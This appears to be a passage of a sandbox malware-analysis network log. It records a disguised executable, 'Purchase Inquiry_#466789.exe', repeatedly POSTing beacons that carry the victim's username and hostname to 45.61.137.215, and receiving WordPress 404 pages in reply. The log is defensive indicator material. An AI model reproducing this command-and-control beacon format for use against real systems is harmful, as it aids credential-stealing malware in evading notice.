                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:37.469767094 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:37.469778061 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:37.469788074 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:33:37.469794035 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:33:37.469804049 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:33:37.469815016 CEST1236INData Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64
                  Data Ascii: near-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(13
                  May 27, 2024 08:33:37.469824076 CEST1236INData Raw: 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74
                  Data Ascii: ed: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .
                  May 27, 2024 08:33:37.469835043 CEST1236INData Raw: 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72
                  Data Ascii: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-c
                  May 27, 2024 08:33:37.469846010 CEST1236INData Raw: 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d
                  Data Ascii: rtant;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.44978045.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:37.619575024 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:37.624476910 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:39.727984905 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:38 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:39.728049040 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:39.728085041 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:39.728117943 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:39.728158951 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:39.728193045 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:39.728225946 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:39.728257895 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:39.728291988 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:33:39.728327990 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.44978145.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:39.932615995 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:39.938011885 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:42.036580086 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:40 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:42.036607981 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:42.036626101 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:42.036642075 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                  Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                  May 27, 2024 08:33:42.036659002 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                  Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                  May 27, 2024 08:33:42.036675930 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                  Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                  May 27, 2024 08:33:42.036693096 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:42.036708117 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:42.036722898 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:42.036740065 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.44978245.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:42.194443941 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:42.199796915 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:44.488277912 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:42 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
